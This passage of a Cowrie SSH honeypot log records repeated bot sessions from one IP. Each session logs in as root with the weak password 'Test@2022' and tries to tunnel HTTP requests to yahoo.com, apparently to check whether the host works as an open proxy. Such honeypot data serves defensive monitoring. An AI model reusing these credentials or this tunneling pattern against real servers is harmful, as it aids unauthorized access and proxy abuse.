{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.088535Z","src_ip":"213.209.150.239","session":"876b9eedb817"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.145993Z","src_ip":"213.209.150.239","session":"876b9eedb817"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35806,"dst_ip":"1.2.3.4","dst_port":22,"session":"1612207fe96d","protocol":"ssh","message":"New connection: 213.209.150.239:35806 (1.2.3.4:22) [session: 1612207fe96d]","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.201728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.203303Z","src_ip":"213.209.150.239","session":"1612207fe96d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.259805Z","src_ip":"213.209.150.239","session":"1612207fe96d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.542139Z","src_ip":"213.209.150.239","session":"1612207fe96d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":1880,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:1880","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.599798Z","session":"1612207fe96d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.656989Z","src_ip":"213.209.150.239","session":"1612207fe96d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":22639,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:22639","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.811026Z","session":"1612207fe96d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.867725Z","src_ip":"213.209.150.239","session":"1612207fe96d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.926531Z","src_ip":"213.209.150.239","session":"1612207fe96d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35866,"dst_ip":"1.2.3.4","dst_port":22,"session":"821a6b004ed5","protocol":"ssh","message":"New connection: 213.209.150.239:35866 (1.2.3.4:22) [session: 821a6b004ed5]","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.982163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:20.982944Z","src_ip":"213.209.150.239","session":"821a6b004ed5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:21.039920Z","src_ip":"213.209.150.239","session":"821a6b004ed5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:21.322417Z","src_ip":"213.209.150.239","session":"821a6b004ed5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":17619,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:17619","sensor":"my-vps","timestamp":"2025-08-26T01:05:21.379988Z","session":"821a6b004ed5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:21.436986Z","src_ip":"213.209.150.239","session":"821a6b004ed5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":2054,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2054","sensor":"my-vps","timestamp":"2025-08-26T01:05:21.591074Z","session":"821a6b004ed5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:21.647885Z","src_ip":"213.209.150.239","session":"821a6b004ed5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:21.705382Z","src_ip":"213.209.150.239","session":"821a6b004ed5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35968,"dst_ip":"1.2.3.4","dst_port":22,"session":"446791498145","protocol":"ssh","message":"New connection: 213.209.150.239:35968 (1.2.3.4:22) [session: 446791498145]","sensor":"my-vps","timestamp":"2025-08-26T01:05:21.761025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:21.761766Z","src_ip":"213.209.150.239","session":"446791498145"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:21.818438Z","src_ip":"213.209.150.239","session":"446791498145"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.101172Z","src_ip":"213.209.150.239","session":"446791498145"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":9883,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:9883","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.159254Z","session":"446791498145"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.216132Z","src_ip":"213.209.150.239","session":"446791498145"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":15933,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:15933","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.371153Z","session":"446791498145"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.427848Z","src_ip":"213.209.150.239","session":"446791498145"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.485453Z","src_ip":"213.209.150.239","session":"446791498145"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36052,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e98996ce593","protocol":"ssh","message":"New connection: 213.209.150.239:36052 (1.2.3.4:22) [session: 1e98996ce593]","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.541366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.542196Z","src_ip":"213.209.150.239","session":"1e98996ce593"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.598796Z","src_ip":"213.209.150.239","session":"1e98996ce593"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.881364Z","src_ip":"213.209.150.239","session":"1e98996ce593"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":4916,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:4916","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.938885Z","session":"1e98996ce593"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:22.995798Z","src_ip":"213.209.150.239","session":"1e98996ce593"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":11996,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:11996","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.151086Z","session":"1e98996ce593"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.207853Z","src_ip":"213.209.150.239","session":"1e98996ce593"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.265313Z","src_ip":"213.209.150.239","session":"1e98996ce593"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36113,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba3c93e3ec84","protocol":"ssh","message":"New connection: 213.209.150.239:36113 (1.2.3.4:22) [session: ba3c93e3ec84]","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.311480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.321465Z","src_ip":"213.209.150.239","session":"ba3c93e3ec84"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.359220Z","src_ip":"213.209.150.239","session":"ba3c93e3ec84"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.593966Z","src_ip":"213.209.150.239","session":"ba3c93e3ec84"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":16092,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:16092","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.642369Z","session":"ba3c93e3ec84"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.689593Z","src_ip":"213.209.150.239","session":"ba3c93e3ec84"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":9002,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9002","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.825505Z","session":"ba3c93e3ec84"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.872777Z","src_ip":"213.209.150.239","session":"ba3c93e3ec84"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.921210Z","src_ip":"213.209.150.239","session":"ba3c93e3ec84"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36165,"dst_ip":"1.2.3.4","dst_port":22,"session":"383f8c6c066b","protocol":"ssh","message":"New connection: 213.209.150.239:36165 (1.2.3.4:22) [session: 383f8c6c066b]","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.967182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:23.968019Z","src_ip":"213.209.150.239","session":"383f8c6c066b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-